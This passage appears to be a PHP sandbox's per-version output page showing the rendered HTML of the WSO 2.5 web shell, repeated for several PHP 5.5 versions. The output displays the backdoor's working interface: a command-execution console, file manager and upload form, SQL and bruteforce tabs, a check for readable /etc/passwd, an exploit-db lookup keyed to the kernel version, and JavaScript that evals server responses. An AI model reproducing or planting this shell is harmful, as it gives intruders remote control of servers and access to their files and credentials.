)<br>5.5.18 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.16
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.16 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.15
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.15 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.14
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.14 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.13
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.13 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" 